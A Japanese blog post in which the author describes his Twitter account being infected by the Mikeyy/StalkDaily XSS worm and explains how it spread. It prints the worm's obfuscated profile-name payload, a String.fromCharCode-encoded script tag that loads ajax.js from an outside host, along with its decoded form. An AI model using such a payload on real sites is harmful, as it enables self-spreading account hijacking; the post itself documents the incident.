TwitterのXSS脆弱性を攻撃するMikeyyワームに感染した

昨日Twitterを使っていたら、突然タイムラインの自分の発言に、覚えのない英文が投稿されているのに気づきました。まさかパスワードでも盗まれたのかと思いsetting画面を見てみると、プロフィール欄がかなりおかしなことになっていました。

どうやらTwitterにXSS脆弱性が存在していて、その脆弱性をついたスクリプトが実行されてしまったようなのです。

その攻撃コードの仕組みはこんな感じでした。

• プロフィールの「Name」に script タグを document.write で書き出すコードを設定
• そのユーザのページを表示するとスクリプトが実行される
• 実行されたスクリプトによって、勝手につぶやきが投稿される
• さらにプロフィールの「Name」や「URL」や「背景色」などが書き換えられる
• そのユーザのページを他のユーザが見ると、さらに感染

どのような「名前」が設定されていたかをメモし忘れていたのですが、偶然ワームに感染していた時にフォローしてきた海外のユーザがいたため、Twitterのフォローお知らせメールにその「名前」が記録されていました。

"><title><script>document.write(String.fromCharCode(
60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,
119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,
97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

これがワームが設定した名前のようです。(こちらで改行を入れてあります。)

String.fromCharCodeの中身が人間には読めないようになっていますが、文字列に直すと次のようになります。

<script src="http://www.stalkdaily.com/ajax.js"></script>

この script タグが document.write で書き出されてスクリプトが実行される仕組みになっていたようです。現在そのスクリプトは存在していませんが、一応昨日コピペして手元に保存してあります。

「Twitterがタイトルタグを変更してGoogleランク上昇へ」という記事にあるように先月Twitterのタイトルタグにユーザの名前が入るようになったのですが、ここに脆弱性が存在していたのかもしれません。

また、日本時間で13日の午後に脆弱性が修正されたという報告がなされていましたが、自分のアカウントが被害を受けたのは13日の午後5時過ぎだったので、少なくともその時間までは脆弱性は存在していた、もしくは完全に対処されていなかったものと思われます。

(追記)「Twitterへのワーム攻撃続く―4波目のMikeyy（アップデート）」で報じられている件かも。

まったく迷惑な話です。

【関連記事】
「Samy」と同種のワーム：Twitter、XSS攻撃の標的に - ITmedia エンタープライズ
Twitterで脆弱性突くワームが出現--作成者は17歳の少年:ニュース - CNET Japan
シロクマ日報 > Twitter の"StalkDaily"ワーム、犯人は17歳 : ITmedia オルタナティブ・ブログ
Twitter Vulnerability: Mutating Fast and More on the Way - ReadWriteWeb
警告：Twitter、StalkDailyワームに襲われる（アップデート）